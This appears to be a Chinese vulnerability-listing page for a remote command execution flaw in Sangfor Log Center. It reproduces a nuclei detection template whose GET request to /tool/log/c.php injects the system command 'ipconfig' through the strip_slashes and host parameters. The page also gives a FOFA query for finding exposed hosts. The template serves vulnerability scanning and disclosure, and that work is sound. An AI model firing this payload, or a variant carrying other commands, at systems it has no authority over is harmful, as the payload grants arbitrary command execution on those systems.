sangfor-cphp-rce: Sangfor Log Center - Remote Command Execution

日期: 2025-08-01 | 影响软件: Sangfor Log Center | POC: 已公开

漏洞描述

Sangfor Log Center is vulnerable to RCE.

PoC代码[已公开]

id: sangfor-cphp-rce

info:
  name: Sangfor Log Center - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: Sangfor Log Center is vulnerable to RCE.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1
  metadata:
    verified: true
    max-request: 1
    fofa-query: "isHighPerformance : !!SFIsHighPerformance"
  tags: sangfor,rce,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Windows IP"
          - "Log Helper"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022027457dbcaafdb8941f869ba6e86f0f3774e159671f613a70c85ba3d20d4ad9ac02207110f34387c2b8dfd18e25351e875835ec7d0e8f5cedc808302e3d8cb35875c6:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/sangfor-cphp-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐